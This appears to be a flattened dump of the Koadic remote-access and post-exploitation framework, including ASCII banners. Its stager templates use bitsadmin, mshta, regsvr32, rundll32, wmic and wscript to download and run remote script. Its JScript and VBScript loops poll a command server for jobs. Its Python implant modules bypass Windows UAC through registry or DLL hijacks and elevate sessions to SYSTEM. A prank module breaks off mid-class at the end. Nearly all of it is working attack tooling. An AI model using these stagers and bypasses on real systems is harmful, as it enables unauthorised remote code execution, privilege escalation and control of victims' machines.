` `\033[0m 19 | \033[33;32m ``ohdhhh/` .:oyyyyssyyhy+-`-y` `\033[0m 20 | \033[33;32m ./+shhyyssyhhhy+.+::``+hyss/:` `\033[0m 21 | \033[33;32m `..:///++/+ssyhh/ ` `\033[0m 22 | \033[33;32m .` ``` `---` :+`\033[0m 23 | \033[33;32m `\033[0m 24 | -------------------------------------------------------------------------------- /data/stager/js/bitsadmin/bitsadmin.cmd: -------------------------------------------------------------------------------- 1 | bitsadmin /transfer ~ENDPOINT~ /download /priority high ~URL~ %temp%\~FENDPOINT~ & start /wait %temp%\~FENDPOINT~ & del %temp%\~FENDPOINT~ -------------------------------------------------------------------------------- /data/stager/js/bitsadmin/template.wsf: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 10 | 11 | -------------------------------------------------------------------------------- /data/stager/js/disk/disk.cmd: -------------------------------------------------------------------------------- 1 | echo try{x=new ActiveXObject('Microsoft.XMLHTTP');x.open('GET','~URL~',false);x.send();eval(x.responseText)}catch(e){}>~DIRECTORY~/~SCRIPT~&start wscript ~DIRECTORY~/~SCRIPT~ 2 | -------------------------------------------------------------------------------- /data/stager/js/mshta/mshta.cmd: -------------------------------------------------------------------------------- 1 | mshta ~URL~ 2 | -------------------------------------------------------------------------------- /data/stager/js/mshta/template.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 17 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /data/stager/js/mshtajs/mshtajs.cmd: -------------------------------------------------------------------------------- 1 | mshta javascript:eval("x=new 
ActiveXObject('WinHttp.WinHttpRequest.5.1');x.open('GET','~URL~~DLLJSPATH~~SESSIONPATH~',false);x.send();eval(x.responseText)")(window.close()) 2 | -------------------------------------------------------------------------------- /data/stager/js/regsvr/regsvr.cmd: -------------------------------------------------------------------------------- 1 | regsvr32 /s /u /n /i:~URL~ scrobj 2 | -------------------------------------------------------------------------------- /data/stager/js/regsvr/template.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /data/stager/js/rundll32/rundll32.cmd: -------------------------------------------------------------------------------- 1 | rundll32.exe ~URL~\..\..\..\./mshtml,RunHTMLApplication 2 | -------------------------------------------------------------------------------- /data/stager/js/rundll32_js/rundll32_js.cmd: -------------------------------------------------------------------------------- 1 | rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","~URL~",false);x.send();eval(x.responseText);window.close(); 2 | -------------------------------------------------------------------------------- /data/stager/js/stage.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | if (Koadic.JOBKEY != "stage") 4 | { 5 | if (Koadic.isHTA()) 6 | { 7 | //HKCU\SOFTWARE\Microsoft\Internet Explorer\Style\MaxScriptStatements = 0xFFFFFFFF 8 | var path = "SOFTWARE\\Microsoft\\Internet Explorer\\Styles"; 9 | var key = "MaxScriptStatements"; 10 | Koadic.registry.write(Koadic.registry.HKCU, path, key, 0xFFFFFFFF, Koadic.registry.DWORD); 11 | } 12 | 13 | Koadic.work.report(Koadic.user.info()); 14 | 15 | try { 16 | Koadic.work.fork(""); 17 | } catch (e) { 18 | Koadic.work.error(e) 19 | } 20 | 
Koadic.exit(); 21 | } 22 | else 23 | { 24 | if (Koadic.isHTA()) 25 | DoWorkTimeout(); 26 | else 27 | DoWorkLoop(); 28 | } 29 | } 30 | catch (e) 31 | { 32 | // todo: critical error reporting 33 | Koadic.work.error(e); 34 | } 35 | 36 | function DoWork() 37 | { 38 | 39 | var epoch = new Date().getTime(); 40 | var expire = parseInt(Koadic.EXPIRE); 41 | if (epoch > expire) 42 | { 43 | return false; 44 | } 45 | 46 | try 47 | { 48 | var work = Koadic.work.get(); 49 | // 201 = x64 or x86 50 | // 202 = force x86 51 | if (work.status == 201 || work.status == 202) 52 | { 53 | if (work.responseText.length > 0) { 54 | var jobkey = work.responseText; 55 | Koadic.work.fork(jobkey, work.status == 202); 56 | } 57 | } 58 | else // if (work.status == 500) // kill code 59 | { 60 | return false; 61 | } 62 | } 63 | catch (e) 64 | { 65 | return false; 66 | } 67 | 68 | return true; 69 | } 70 | 71 | function DoWorkLoop() 72 | { 73 | while (DoWork()) 74 | ; 75 | 76 | Koadic.exit(); 77 | } 78 | 79 | function DoWorkTimeout() 80 | { 81 | for (var i = 0; i < 10; ++i) 82 | { 83 | if (!DoWork()) 84 | { 85 | Koadic.exit(); 86 | return; 87 | } 88 | } 89 | //window.setTimeout(DoWorkTimeoutCallback, 0); 90 | 91 | Koadic.work.fork(""); 92 | Koadic.exit(); 93 | } 94 | -------------------------------------------------------------------------------- /data/stager/js/wmic/template.xsl: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 11 | 12 | -------------------------------------------------------------------------------- /data/stager/js/wmic/wmic.cmd: -------------------------------------------------------------------------------- 1 | wmic os get /FORMAT:"~URL~" 2 | -------------------------------------------------------------------------------- /data/stager/vbscript/disk.cmd: -------------------------------------------------------------------------------- 1 | echo on error resume next:Set 
x=CreateObject("Microsoft.XMLHTTP"):x.open"GET","~URL~",false:x.send:Execute x.responseText>~DIRECTORY~/~FILE~.vbs&start wscript ~DIRECTORY~/~FILE~.vbs 2 | -------------------------------------------------------------------------------- /data/stager/vbscript/mshta.cmd: -------------------------------------------------------------------------------- 1 | mshta vbscript:Execute("on error resume next:Set x=CreateObject(""WinHttp.WinHttpRequest.5.1""):x.open""GET"",""~URL~"",false:x.send:Execute x.responseText")(window.close) 2 | -------------------------------------------------------------------------------- /data/stager/vbscript/work.vbs: -------------------------------------------------------------------------------- 1 | Sub ForkWorkMSHTA(jobkey) 2 | cmd = "mshta vbscript:Execute(""window.blur:window.moveTo -2000,-2000:on error resume next:Set x=CreateObject(""""WinHttp.WinHttpRequest.5.1""""):" 3 | cmd = cmd & "x.open""""POST"""",""""" & jobpath & """"",false:" 4 | cmd = cmd & "x.setRequestHeader""""sessionkey"""",""""" & sessionkey & """"":" 5 | cmd = cmd & "x.setRequestHeader""""jobkey"""",""""" & jobkey & """"":" 6 | cmd = cmd & "x.send:Execute x.responseText"")(window.close)" 7 | 8 | 9 | 'kows.Run cmd, 0, false 10 | KoExecWMI cmd 11 | End Sub 12 | 13 | Sub ForkWorkWscript(jobkey) 14 | path = KoGetPath("~DIRECTORY~/~FILE~1.vbs") 15 | 16 | data = "on error resume next:Set x=CreateObject(""Microsoft.XMLHTTP""):x.open""POST"",""" & jobpath & """,false:" 17 | data = data & "x.setRequestHeader""sessionkey"",""" & sessionkey & """:" 18 | data = data & "x.setRequestHeader""jobkey"",""" & jobkey & """:" 19 | data = data & "x.send:Execute x.responseText" 20 | 21 | KoWriteFile path, data 22 | 23 | cmd = "cmd /q /c start wscript " & path 24 | kows.Run cmd, 0, false 25 | end Sub 26 | 27 | Sub ForkWork(jobkey) 28 | if isobject(Wscript) then 29 | ForkWorkWscript jobkey 30 | else 31 | ForkWorkMSHTA jobkey 32 | end if 33 | end sub 34 | 35 | Sub DoWork 36 | on error resume next 
37 | set work = KoGetWork() 38 | if err.number = 0 then 39 | if work.status = 201 then 40 | jobkey = work.responseText 41 | ForkWork jobkey 42 | end if 43 | else 44 | KoSleep 10 45 | end if 46 | End Sub 47 | 48 | Sub DoWorkTimeOut 49 | on error resume next 50 | for i = 0 to 2 51 | DoWork 52 | next 53 | ForkWork "stage" 54 | KoSleep 5 55 | KoExit 56 | 57 | 'timeouthandle = window.setTimeout(GetRef("DoWorkTimeOut"), 0)', "VBScript") 58 | end Sub 59 | 60 | Sub DoWorkLoop 61 | on error resume next 62 | do while True 63 | DoWork 64 | Loop 65 | end Sub 66 | 67 | if isobject(window) then 68 | 'window.stop 69 | doworktimeout 70 | else 71 | doworkloop 72 | end if 73 | -------------------------------------------------------------------------------- /data/taco.txt: -------------------------------------------------------------------------------- 1 | 2 | \033[32;1m/oosso:/sys:/yy/:o`\033[0m 3 | \033[32;1m+s\033[0m\033[31;1m/\033[0m\033[32;1mo:oso\033[0m\033[31;1mho\033[0m\033[32;1mdso/:y\033[0m\033[33;1msys//////++:`\033[0m 4 | \033[32;1mhs\033[0m\033[31;1m+-\033[0m\033[32;1m/sss\033[0m\033[31;1m/y\033[0m\033[32;1moo+\033[0m\033[33;1msys:. \033[33;1m./+/`\033[0m 5 | \033[32;1m:dyhyshhossooo\033[0m\033[33;1msss: \033[33;1m.++`\033[0m 6 | \033[32;1moyddhsys\033[0m\033[31;1myh\033[0m\033[32;1myysys\033[0m\033[33;1msyo. \033[33;1m.o:\033[0m 7 | \033[32;1m.osd\033[0m\033[31;1msh\033[0m\033[32;1mmhh\033[0m\033[31;1myy\033[0m\033[32;1mso+\033[0m\033[33;1m+y+` \033[33;1mo/\033[0m 8 | \033[32;1m:y///\033[0m\033[31;1moo\033[0m\033[32;1myyysoys/\033[0m\033[33;1m:o. 
\033[33;1m++\033[0m 9 | \033[32;1ms++s+-.+:/o+-\033[0m\033[33;1m+y/ \033[33;1ms-\033[0m 10 | \033[33;1m.y\033[0m\033[33;2m+-+`++-o+:/\033[0m\033[33;1m:s- \033[33;1m.h\033[0m 11 | \033[33;1my-\033[0m\033[33;2m-/:-.++-++\033[0m\033[33;1m:y` \033[33;1md\033[0m 12 | \033[33;1md.\033[0m\033[33;2mo:/-`//-:\033[0m\033[33;1moo` \033[33;1m`h\033[0m 13 | \033[33;1mh.\033[0m\033[33;2mo.+++`++\033[0m\033[33;1m/o \033[33;1m.:+.\033[0m 14 | \033[33;1mho\033[0m\033[33;2m:++++.+\033[0m\033[33;1m:o \033[33;1m.-:/+:.\033[0m 15 | \033[33;1mhy\033[0m\033[33;2m`++:+-\033[0m\033[33;1m+s \033[33;1m`.://///:.``\033[0m 16 | \033[33;1m+h\033[0m\033[33;2m+++:+-\033[0m\033[33;1my` \033[33;1m.-://///:-.``\033[0m 17 | \033[33;1m`hy\033[0m\033[33;2m/--/\033[0m\033[33;1ms` \033[33;1m`-//////:.``\033[0m 18 | \033[33;1m.+ooo/:::/://///:.`\033[0m 19 | -------------------------------------------------------------------------------- /data/valentine.txt: -------------------------------------------------------------------------------- 1 | 2 | _______________ _______________ 3 | | ___________ | | ___________ | 4 | | | 0 0 | | | | 0 0 | | 5 | | | - | | \033[31;1m.:::. 
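.:::.\033[0m | | - | | 6 | | | \\___/ | | \033[31;1m:::::::.:::::::\033[0m | | \\___/ | | 7 | | |___________| | \033[31;1m:::::BE:MY:::::\033[0m | |___________| | 8 | |_______________| \033[31;1m':::ZOMBIE?:::'\033[0m |_______________| 9 | _|________|_...........\033[31;1m':::::::::'\033[0m..........._|________|_ 10 | / ********** \\ \033[31;1m':::::'\033[0m / ********** \\ 11 | / ************ \\ \033[31;1m':'\033[0m / ************ \\ 12 | -------------------- -------------------- 13 |
-------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_compdefaults.py: --------------------------------------------------------------------------------
import core.job
import core.implant
import uuid


class CompDefaultsJob(core.job.Job):
    """Job for the ComputerDefaults.exe registry-hijack UAC bypass."""

    def create(self):
        """Resolve PAYLOAD into PAYLOAD_DATA and gate on the session's Windows build.

        Returns False (after registering an error) when the build is below 10240
        or cannot be parsed, unless IGNOREBUILD is set to something other than "false".
        """
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)
        self.options.set("PAYLOAD_DATA", payload)
        # -1 means there is no concrete session to check yet.
        if self.session_id == -1:
            return
        # The build string presumably comes from the zombie's check-in; an
        # unparsable value used to raise ValueError out of create(). Treat it
        # as "unknown" so the operator gets the normal error path instead.
        try:
            build = int(self.session.build)
        except (TypeError, ValueError):
            build = None
        # Build window the technique was reported against; IGNOREBUILD only
        # skips this gate, it does not make the technique work elsewhere.
        if (build is None or build < 10240) and self.options.get("IGNOREBUILD") == "false":
            self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "")
            return False

    def done(self):
        self.display()

    def display(self):
        # Success is reported as a bare "Completed"; the job prints nothing else.
        self.results = "Completed"


class CompDefaultImplant(core.implant.Implant):
    """Bypass UAC by hijacking the registry lookup made by ComputerDefaults.exe."""

    NAME = "Bypass UAC CompDefaults"
    DESCRIPTION = "Bypass UAC via registry hijack for ComputerDefaults.exe. Drops no files to disk."
    AUTHORS = ["TheNaterz", "st0rnpentest"]
    STATE = "implant/elevate/bypassuac_compdefaults"

    def load(self):
        """Register PAYLOAD (a listener/stager id) and the hidden, resolved PAYLOAD_DATA."""
        self.options.register("PAYLOAD", "", "run listeners for a list of IDs")
        self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True)

    def job(self):
        return CompDefaultsJob

    def run(self):
        """Refuse to dispatch when PAYLOAD does not resolve; otherwise send the JScript workload."""
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)

        if payload is None:
            self.shell.print_error("Payload %s not found." % payload_id)
            return False

        workloads = {}
        workloads["js"] = "data/implant/elevate/bypassuac_compdefaults.js"

        self.dispatch(workloads, self.job)
-------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_compmgmtlauncher.py: --------------------------------------------------------------------------------
import core.job
import core.implant
import uuid


class CompMgmtLauncherJob(core.job.Job):
    """Job for the CompMgmtLauncher.exe registry-hijack UAC bypass."""

    def create(self):
        """Resolve PAYLOAD into PAYLOAD_DATA and gate on the session's Windows build.

        Returns False (after registering an error) when the build is outside
        7600..15030 or cannot be parsed, unless IGNOREBUILD is not "false".
        """
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)
        self.options.set("PAYLOAD_DATA", payload)
        # -1 means there is no concrete session to check yet.
        if self.session_id == -1:
            return
        # Unparsable build strings are treated as unknown rather than raising.
        try:
            build = int(self.session.build)
        except (TypeError, ValueError):
            build = None
        # Build window the technique was reported against.
        if (build is None or build < 7600 or build > 15030) and self.options.get("IGNOREBUILD") == "false":
            self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "")
            return False

    def done(self):
        self.display()

    def display(self):
        self.results = "Completed"


class CompMgmtLauncherImplant(core.implant.Implant):
    """Bypass UAC by hijacking the registry lookup made by CompMgmtLauncher.exe."""

    NAME = "Bypass UAC CompMgmtLauncher"
    DESCRIPTION = "Bypass UAC via registry hijack for CompMgmtLauncher.exe. Drops no files to disk."
    AUTHORS = ["TheNaterz", "enigma0x3"]
    STATE = "implant/elevate/bypassuac_compmgmtlauncher"

    def load(self):
        """Register PAYLOAD (a listener/stager id) and the hidden, resolved PAYLOAD_DATA."""
        self.options.register("PAYLOAD", "", "run listeners for a list of IDs")
        self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True)

    def job(self):
        return CompMgmtLauncherJob

    def run(self):
        """Refuse to dispatch when PAYLOAD does not resolve; otherwise send the JScript workload."""
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)

        if payload is None:
            self.shell.print_error("Payload %s not found." % payload_id)
            return False

        workloads = {}
        workloads["js"] = "data/implant/elevate/bypassuac_compmgmtlauncher.js"

        self.dispatch(workloads, self.job)
-------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_eventvwr.py: --------------------------------------------------------------------------------
import core.job
import core.implant
import uuid


class EventVwrJob(core.job.Job):
    """Job for the eventvwr.exe registry-hijack UAC bypass."""

    def create(self):
        """Resolve PAYLOAD into PAYLOAD_DATA and gate on the session's Windows build.

        Returns False (after registering an error) when the build is outside
        7600..15030 or cannot be parsed, unless IGNOREBUILD is not "false".
        """
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)
        self.options.set("PAYLOAD_DATA", payload)
        # -1 means there is no concrete session to check yet.
        if self.session_id == -1:
            return
        # Unparsable build strings are treated as unknown rather than raising.
        try:
            build = int(self.session.build)
        except (TypeError, ValueError):
            build = None
        # Build window the technique was reported against.
        if (build is None or build < 7600 or build > 15030) and self.options.get("IGNOREBUILD") == "false":
            self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "")
            return False

    def done(self):
        self.display()

    def display(self):
        self.results = "Completed"


class EventVwrImplant(core.implant.Implant):
    """Bypass UAC by hijacking the registry lookup made by eventvwr.exe."""

    NAME = "Bypass UAC EventVwr"
    DESCRIPTION = "Bypass UAC via registry hijack for eventvwr.exe. Drops no files to disk."
    AUTHORS = ["zerosum0x0", "@enigma0x3"]
    STATE = "implant/elevate/bypassuac_eventvwr"

    def load(self):
        """Register PAYLOAD (a listener/stager id) and the hidden, resolved PAYLOAD_DATA."""
        self.options.register("PAYLOAD", "", "run listeners for a list of IDs")
        self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True)

    def job(self):
        return EventVwrJob

    def run(self):
        """Refuse to dispatch when PAYLOAD does not resolve; otherwise send the JScript workload."""
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)

        if payload is None:
            self.shell.print_error("Payload %s not found." % payload_id)
            return

        workloads = {}
        workloads["js"] = "data/implant/elevate/bypassuac_eventvwr.js"

        self.dispatch(workloads, self.job)
-------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_fodhelper.py: --------------------------------------------------------------------------------
import core.job
import core.implant
import uuid


class FodHelperJob(core.job.Job):
    """Job for the fodhelper.exe registry-hijack UAC bypass."""

    def create(self):
        """Resolve PAYLOAD into PAYLOAD_DATA and gate on the session's Windows build.

        Returns False (after registering an error) when the build is below 10240
        or cannot be parsed, unless IGNOREBUILD is not "false".
        """
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)
        self.options.set("PAYLOAD_DATA", payload)
        # -1 means there is no concrete session to check yet.
        if self.session_id == -1:
            return
        # Unparsable build strings are treated as unknown rather than raising.
        try:
            build = int(self.session.build)
        except (TypeError, ValueError):
            build = None
        # Build window the technique was reported against.
        if (build is None or build < 10240) and self.options.get("IGNOREBUILD") == "false":
            self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "")
            return False

    def done(self):
        self.display()

    def display(self):
        self.results = "Completed"


class FodHelperImplant(core.implant.Implant):
    """Bypass UAC by hijacking the registry lookup made by fodhelper.exe."""

    NAME = "Bypass UAC FodHelper"
    DESCRIPTION = "Bypass UAC via registry hijack for fodhelper.exe. Drops no files to disk."
    AUTHORS = ["TheNaterz", "winscriptingblog"]
    STATE = "implant/elevate/bypassuac_fodhelper"

    def load(self):
        """Register PAYLOAD (a listener/stager id) and the hidden, resolved PAYLOAD_DATA."""
        self.options.register("PAYLOAD", "", "run listeners for a list of IDs")
        self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True)

    def job(self):
        return FodHelperJob

    def run(self):
        """Refuse to dispatch when PAYLOAD does not resolve; otherwise send the JScript workload."""
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)

        if payload is None:
            self.shell.print_error("Payload %s not found." % payload_id)
            return

        workloads = {}
        workloads["js"] = "data/implant/elevate/bypassuac_fodhelper.js"

        self.dispatch(workloads, self.job)
-------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_sdclt.py: --------------------------------------------------------------------------------
import core.job
import core.implant
import uuid


class SDCLTJob(core.job.Job):
    """Job for the sdclt.exe registry-hijack UAC bypass."""

    def create(self):
        """Resolve PAYLOAD into PAYLOAD_DATA and gate on the session's Windows build.

        Returns False (after registering an error) when the build is outside
        10240..17024 or cannot be parsed, unless IGNOREBUILD is not "false".
        """
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)
        self.options.set("PAYLOAD_DATA", payload)
        # -1 means there is no concrete session to check yet.
        if self.session_id == -1:
            return
        # Unparsable build strings are treated as unknown rather than raising.
        try:
            build = int(self.session.build)
        except (TypeError, ValueError):
            build = None
        # Build window the technique was reported against.
        if (build is None or build < 10240 or build > 17024) and self.options.get("IGNOREBUILD") == "false":
            self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "")
            return False

    def done(self):
        self.display()

    def display(self):
        self.results = "Completed"


class SDCLTImplant(core.implant.Implant):
    """Bypass UAC by hijacking the registry lookup made by sdclt.exe."""

    NAME = "Bypass UAC SDCLT"
    DESCRIPTION = "Bypass UAC via registry hijack for sdclt.exe. Drops no files to disk."
    AUTHORS = ["zerosum0x0", "@enigma0x3"]
    STATE = "implant/elevate/bypassuac_sdclt"

    def load(self):
        """Register PAYLOAD (a listener/stager id) and the hidden, resolved PAYLOAD_DATA."""
        self.options.register("PAYLOAD", "", "run listeners for a list of IDs")
        self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True)

    def job(self):
        return SDCLTJob

    def run(self):
        """Refuse to dispatch when PAYLOAD does not resolve; otherwise send the JScript workload."""
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)

        if payload is None:
            self.shell.print_error("Payload %s not found." % payload_id)
            return

        workloads = {}
        workloads["js"] = "data/implant/elevate/bypassuac_sdclt.js"

        self.dispatch(workloads, self.job)
-------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_slui.py: --------------------------------------------------------------------------------
import core.job
import core.implant
import uuid


class SLUIJob(core.job.Job):
    """Job for the slui.exe registry-hijack UAC bypass."""

    def create(self):
        """Resolve PAYLOAD into PAYLOAD_DATA and gate on the session's Windows build.

        Returns False (after registering an error) when the build is outside
        9600..17133 or cannot be parsed, unless IGNOREBUILD is not "false".
        """
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)
        self.options.set("PAYLOAD_DATA", payload)
        # -1 means there is no concrete session to check yet.
        if self.session_id == -1:
            return
        # Unparsable build strings are treated as unknown rather than raising.
        try:
            build = int(self.session.build)
        except (TypeError, ValueError):
            build = None
        # Build window the technique was reported against.
        if (build is None or build < 9600 or build > 17133) and self.options.get("IGNOREBUILD") == "false":
            self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "")
            return False

    def done(self):
        self.display()

    def display(self):
        self.results = "Completed"


class SLUIImplant(core.implant.Implant):
    """Bypass UAC by hijacking the registry lookup made by slui.exe."""

    NAME = "Bypass UAC slui"
    DESCRIPTION = "Bypass UAC via registry hijack for slui.exe. Drops no files to disk."
    AUTHORS = ["TheNaterz", "bytecode77"]
    STATE = "implant/elevate/bypassuac_slui"

    def load(self):
        """Register PAYLOAD (a listener/stager id) and the hidden, resolved PAYLOAD_DATA."""
        self.options.register("PAYLOAD", "", "run listeners for a list of IDs")
        self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True)

    def job(self):
        return SLUIJob

    def run(self):
        """Refuse to dispatch when PAYLOAD does not resolve; otherwise send the JScript workload."""
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)

        if payload is None:
            self.shell.print_error("Payload %s not found." % payload_id)
            return

        workloads = {}
        workloads["js"] = "data/implant/elevate/bypassuac_slui.js"

        self.dispatch(workloads, self.job)
-------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_systempropertiesadvanced.py: --------------------------------------------------------------------------------
import core.job
import core.implant
import uuid


class SystemPropertiesAdvancedJob(core.job.Job):
    """Job for the SystemPropertiesAdvanced.exe DLL-hijack UAC bypass.

    Unlike the registry-hijack modules this one takes no PAYLOAD: the operator
    must already have placed the DLL named in the DLL option on the target.
    """

    def create(self):
        """Gate on the session's Windows build (14393 <= build < 18632).

        Returns False (after registering an error) when the build is outside
        that window or cannot be parsed, unless IGNOREBUILD is not "false".
        """
        # -1 means there is no concrete session to check yet.
        if self.session_id == -1:
            return
        # Unparsable build strings are treated as unknown rather than raising.
        try:
            build = int(self.session.build)
        except (TypeError, ValueError):
            build = None
        # Build window the technique was reported against (upper bound is exclusive here).
        if (build is None or build < 14393 or build >= 18632) and self.options.get("IGNOREBUILD") == "false":
            self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "")
            return False

    def done(self):
        self.display()

    def display(self):
        self.results = "Completed"


class SystemPropertiesAdvancedImplant(core.implant.Implant):
    """Bypass UAC by planting a DLL that SystemPropertiesAdvanced.exe loads from a user-writable path."""

    NAME = "Bypass UAC SystemPropertiesAdvanced"
    DESCRIPTION = "UAC bypass through DLL Hijacking method (systempropertiesadvanced binary)"
    AUTHORS = ["@JosueEncinar"]
    STATE = "implant/elevate/bypassuac_systempropertiesadvanced"

    def load(self):
        """Register USER and DLL; note this module does write a file (the DLL) to the target."""
        self.options.register("USER", "", "Current User")
        self.options.register("DLL", "", "Malicius DLL. First use msfvenom and upload it to Windows. Example: C:/Users/IEUser/Desktop/srrstr.dll")

    def job(self):
        return SystemPropertiesAdvancedJob

    def run(self):
        """Dispatch the JScript workload; there is no payload to validate here."""
        workloads = {}
        workloads["js"] = "data/implant/elevate/bypassuac_systempropertiesadvanced.js"

        self.dispatch(workloads, self.job)
-------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_wsreset.py: --------------------------------------------------------------------------------
import core.job
import core.implant
import uuid


class WsResetJob(core.job.Job):
    """Job for the WSReset.exe UAC bypass."""

    def create(self):
        """Resolve PAYLOAD into PAYLOAD_DATA and gate on the session's Windows build.

        Returns False (after registering an error) when the build is below 17134
        or cannot be parsed, unless IGNOREBUILD is not "false".
        """
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)
        self.options.set("PAYLOAD_DATA", payload)
        # -1 means there is no concrete session to check yet.
        if self.session_id == -1:
            return
        # Unparsable build strings are treated as unknown rather than raising.
        try:
            build = int(self.session.build)
        except (TypeError, ValueError):
            build = None
        # Build window the technique was reported against.
        if (build is None or build < 17134) and self.options.get("IGNOREBUILD") == "false":
            self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "")
            return False

    def done(self):
        self.display()

    def display(self):
        self.results = "Completed"


class WsResetImplant(core.implant.Implant):
    """Bypass UAC through WSReset.exe without writing the payload to disk."""

    NAME = "Bypass UAC Wsreset"
    DESCRIPTION = "UAC bypass Fileless - Wsreset bypass UAC ."
    AUTHORS = ["@JosueEncinar"]
    STATE = "implant/elevate/bypassuac_wsreset"

    def load(self):
        """Register PAYLOAD (a listener/stager id) and the hidden, resolved PAYLOAD_DATA."""
        self.options.register("PAYLOAD", "", "run listeners for a list of IDs")
        self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True)

    def job(self):
        return WsResetJob

    def run(self):
        """Refuse to dispatch when PAYLOAD does not resolve; otherwise send the JScript workload."""
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)

        if payload is None:
            self.shell.print_error("Payload %s not found." % payload_id)
            return

        workloads = {}
        workloads["js"] = "data/implant/elevate/bypassuac_wsreset.js"

        self.dispatch(workloads, self.job)
-------------------------------------------------------------------------------- /modules/implant/elevate/system_createservice.py: --------------------------------------------------------------------------------
import core.job
import core.implant
import uuid


class CreateServiceJob(core.job.Job):
    """Job that elevates an already-administrative session to SYSTEM via sc.exe."""

    def create(self):
        """Resolve PAYLOAD into PAYLOAD_DATA and require an elevated session.

        Returns False (after registering an error) when the session is not
        elevated, unless IGNOREADMIN is set to something other than "false".
        """
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)
        self.options.set("PAYLOAD_DATA", payload)
        # -1 means there is no concrete session to check yet.
        if self.session_id == -1:
            return
        # Service creation needs an elevated token; IGNOREADMIN only skips the
        # check, it does not grant the privilege.
        if self.session.elevated != 1 and self.options.get("IGNOREADMIN") == "false":
            self.error("0", "This job requires an elevated session. Set IGNOREADMIN to true to run anyway.", "Not elevated", "")
            return False

    def done(self):
        self.display()

    def display(self):
        self.results = "Completed"


class CreateServiceImplant(core.implant.Implant):
    """Create a service with sc.exe so the payload runs as SYSTEM."""

    NAME = "SYSTEM via SC.exe"
    DESCRIPTION = "Elevate from an administrative session to SYSTEM via SC.exe. Drops no files to disk."
    AUTHORS = ["TheNaterz", "jennamagius"]
    STATE = "implant/elevate/system_createservice"

    def load(self):
        """Register PAYLOAD (a listener/stager id) and the hidden, resolved PAYLOAD_DATA."""
        self.options.register("PAYLOAD", "", "run listeners for a list of IDs")
        self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True)

    def job(self):
        return CreateServiceJob

    def run(self):
        """Refuse to dispatch when PAYLOAD does not resolve; otherwise send the JScript workload."""
        payload_id = self.options.get("PAYLOAD")
        payload = self.load_payload(payload_id)

        if payload is None:
            self.shell.print_error("Payload %s not found." % payload_id)
            return

        workloads = {}
        workloads["js"] = "data/implant/elevate/system_createservice.js"

        self.dispatch(workloads, self.job)
-------------------------------------------------------------------------------- /modules/implant/fun/thunderstruck.py: --------------------------------------------------------------------------------
import core.job
import core.implant
import uuid
import urllib.request

# Marker that precedes the video length (in milliseconds) inside the inline
# player JSON of a YouTube watch page. This is scraped, not an API: if the page
# layout changes the lookup fails and _video_length_seconds raises ValueError.
_DURATION_MARKER = 'approxDurationMs\\":\\"'


def _video_length_seconds(url, timeout=15):
    """Fetch *url* and return the approxDurationMs value it embeds as whole seconds.

    NOTE(opsec): this request is made from the Koadic host, not from the zombie,
    so the operator's server address is exposed to the video host.

    Raises ValueError when the marker is missing or the value is not numeric,
    and OSError (including urllib.error.URLError) on network failure or timeout.
    """
    # The original had no timeout, so a hung fetch would block the console.
    with urllib.request.urlopen(url, timeout=timeout) as response:
        page = response.read().decode()
    _, found, tail = page.partition(_DURATION_MARKER)
    if not found:
        raise ValueError("video length marker not found in page at %s" % url)
    ms = tail.split("\\", 1)[0]
    return int(ms) // 1000


class ThunderstruckJob(core.job.Job):
    """Job for the hidden-IE video prank; SECONDS tells the workload how long to keep IE open."""

    def create(self):
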